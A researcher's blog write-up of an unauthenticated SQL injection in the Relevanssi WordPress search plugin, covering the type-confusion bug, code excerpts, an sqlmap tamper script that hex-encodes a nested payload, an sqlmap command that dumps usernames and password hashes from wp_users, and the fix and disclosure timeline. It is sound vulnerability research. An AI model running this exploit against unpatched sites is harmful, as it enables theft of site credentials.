How I found SQL injection on 100,000 WordPress sites

I recently reported an unauthenticated SQL injection in Relevanssi, a WordPress search plugin that was active on more than 100,000 sites. There were two things that made this bug especially fun to work on: first, a type confusion issue where input that only looked like a numeric term ID could carry extra SQL with it, and second, an exploitation trick where one SQL injection payload was smuggled inside another in order to get around the limitations of the first query.

In this post I’ll walk through the code path, show why the bug was exploitable, and explain how I turned it into a practical blind SQL injection through the cats and tags search parameters.

Relevanssi is a plugin that replaces the default WordPress search with a more advanced search engine. It adds features like better relevance ranking and extra filtering options, and those extra search features are what made this bug reachable through public query parameters.

The vulnerable input

Relevanssi extends WordPress search and accepts a few extra query parameters for filtering search results. Two of them are cats and tags, which are used to filter by category and tag.

For categories, the plugin reads the cats parameter, splits it on commas, and stores the resulting values as term IDs:

if ( isset( $query->query_vars['cats'] ) ) {
	$cat = $query->query_vars['cats'];
	if ( is_array( $cat ) ) {
		$cat = implode( ',', $cat );
	}
}
if ( empty( $cat ) ) {
	$cat = get_option( 'relevanssi_cat' );
}
if ( $cat ) {
	$cat         = explode( ',', $cat );
	$tax_query[] = array(
		'taxonomy' => 'category',
		'field'    => 'term_id',
		'terms'    => $cat,
		'operator' => 'IN',
	);
}

The tags parameter is handled in a similar way. In both cases, the plugin expects to be dealing with term IDs, and later code relies on that assumption.

Where things go wrong

The bug appears later, when Relevanssi processes the taxonomy query and tries to turn those user-supplied term values into term taxonomy IDs.

foreach ( $terms_parameter as $name ) {
	$term = get_term_by( $field_name, $name, $taxonomy );
	if ( ! $term ) {
		if ( ctype_digit( strval( $name ) ) ) {
			$numeric_terms[] = $name;
		}
	} elseif ( isset( $term->term_id ) && in_array( $field_name, array( 'slug', 'name' ), true ) ) {
		$names[] = "'" . esc_sql( $name ) . "'";
	} else {
		$numeric_terms[] = $name;
	}
}

return array(
	'numeric_terms' => implode( ',', $numeric_terms ),
	'term_in'       => implode( ',', $names ),
);

The important branch is the final else: if get_term_by() returns a term object, the original value is added to the numeric_terms array without any numeric validation.

That sounds harmless at first, until you look at how WordPress handles term lookups by ID:

if ( 'id' === $field || 'ID' === $field || 'term_id' === $field ) {
	$term = get_term( (int) $value, $taxonomy, $output, $filter );
	if ( is_wp_error( $term ) || null === $term ) {
		$term = false;
	}
	return $term;
}

The value is cast to an integer before the lookup. That means a string like 1foo is treated as the term ID 1 for the lookup, and if term ID 1 exists, the lookup succeeds. But the original string, 1foo, is what gets added to numeric_terms.

This is one of those weird PHP quirks that can lead to bugs in code that looks reasonable at first glance. A string like 1foo quietly becoming 1 during the lookup, without even producing a warning in PHP 8, is exactly the sort of behaviour that makes type assumptions dangerous. Relevanssi ends up treating the original tainted string as if it had been validated as a proper numeric ID.

The injection point

Eventually those values are concatenated into a SQL query:

if ( ! empty( $numeric_terms ) ) {
	$type    = 'term_id';
	$term_in = $numeric_terms;
}

if ( ! empty( $term_in ) ) {
	$row_taxonomy = sanitize_text_field( $row['taxonomy'] );

	$tt_q = "SELECT tt.term_taxonomy_id
			  FROM $wpdb->term_taxonomy AS tt
			  LEFT JOIN $wpdb->terms AS t ON (tt.term_id=t.term_id)
			  WHERE tt.taxonomy = '$row_taxonomy' AND t.$type IN ($term_in)";
	$term_tax_id = $wpdb->get_col( $tt_q );
}

At this point, the assumption is that $term_in contains only numeric IDs separated by commas. But because the original value was never converted to an integer, attacker-controlled SQL can be smuggled into the IN (...) clause.

In practice, the payload has to begin with a valid term ID. For categories that is easy enough, because category ID 1 is usually the default Uncategorized category and cannot be deleted.

So the shape of the request is simple:

?s=vulnerable&cats=1<payload>

The s parameter just needs to contain some ordinary search term, while the payload is carried in cats or tags.

Exploiting it in practice

By default, the result of the injected query is not reflected directly in the search results. The query is mainly used to build restrictions that later affect which posts are returned. Because of that, the practical route is blind SQL injection, and a time-based attack works well.

But there is another twist here.

The first injected query is awkward to work with directly. Since the payload is being smuggled inside a comma-delimited list of term IDs, you cannot use commas in the payload. This was a problem for sqlmap, as it uses SQL IF() statements in its generated queries, and those IF() statements require commas.

The workaround I used was to smuggle a second SQL payload inside the first one. It turns out that the results of the first query are used in a later query, and that later query is also vulnerable to SQL injection. So instead of trying to make the initial injection do all the work, I used it to output a hex-encoded SQL fragment that would then be reused by the later query.

That hex-encoding step is worth pausing on, because it is not very intuitive if you have not run into it before. In MySQL, a value like 0x414243 is interpreted as the string ABC. That means you can represent an entire SQL fragment as hexadecimal and avoid using quotes, commas, and other awkward characters in the first injection point.

The second injection point looked like this:

$query_restrictions .= " AND relevanssi.doc $tq_operator (
	SELECT DISTINCT(tr.object_id)
		FROM $wpdb->term_relationships AS tr
		WHERE tr.term_taxonomy_id IN ($term_tax_id))";
// Clean: all variables are Relevanssi-generated.

The $term_tax_id variable holds the result of the previous query containing the smuggled SQL.

To implement this, I used an sqlmap tamper script, which allows editing any payloads used on the fly. My tamper script looked like this:

#!/usr/bin/env python

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def hex_encode(text: str) -> str:
    return "0x" + "".join("{:02X}".format(ord(c)) for c in text)


def tamper(payload, **kwargs):
    payload = payload.replace("--", "#")
    return f"1) AND 1=2 UNION VALUES ROW({hex_encode(payload)})#"

And the corresponding sqlmap command was:

sqlmap --url="<site-url>?s=vulnerable&cats=1" \
  -p cats \
  --dbms=mysql \
  --level=1 \
  --risk=1 \
  --technique=T \
  --tamper=tamper/hex_encode_tax_query.py \
  --prefix="))" \
  --time-sec=2 \
  --answers="include all tests=n,keep testing=n,store hashes=n,crack=n" \
  --dump -T wp_users -C user_login,user_pass

That was enough to turn the issue into a working time-based blind SQL injection and dump data from the database.

Demo

I recorded a short demo showing the exploitation flow in practice, from the vulnerable search request to the working blind SQL injection.

Fixing the bug

The fix here is simple in principle: values that are supposed to be numeric IDs should be converted to integers before they ever reach the SQL query.

For example, the plugin could cast the values before joining them:

$numeric_terms[] = absint( $name );

It would also help to validate cats and tags earlier, when they are first read from the query parameters:

$cat = array_map( 'absint', explode( ',', $cat ) );

The broader lesson is that a successful lookup is not proof that the original input is safe. In this case, WordPress was willing to cast a string to an integer during the lookup, but Relevanssi later reused the original string as if it were already trusted numeric data.

Timeline

  • 2025-05-03 — Report submitted to Wordfence.
  • 2025-05-07 — Report triaged and bounty of $881 awarded.
  • 2025-05-07 — Relevanssi developer released fixed version 4.24.5.
  • 2025-05-12 — Advisory published as CVE-2025-4396.